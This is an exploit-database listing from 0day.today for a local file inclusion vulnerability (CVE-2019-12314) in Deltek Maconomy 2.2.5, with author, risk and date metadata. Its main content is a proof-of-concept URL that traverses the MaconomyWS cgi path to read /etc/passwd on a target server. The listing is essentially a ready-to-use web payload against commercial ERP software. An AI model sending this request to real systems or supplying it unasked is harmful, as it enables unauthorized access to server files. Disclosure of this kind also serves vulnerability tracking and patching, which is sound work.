[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Deltek Maconomy 2.2.5 Local File Inclusion Vulnerability

Author
Jameel Nabbo
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-32816
Category
web applications
Date add
28-05-2019
CVE
CVE-2019-12314
Platform
cgi
# Exploit Title: Maconomy Erp local file include
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

#  0day.today [2024-09-28]  #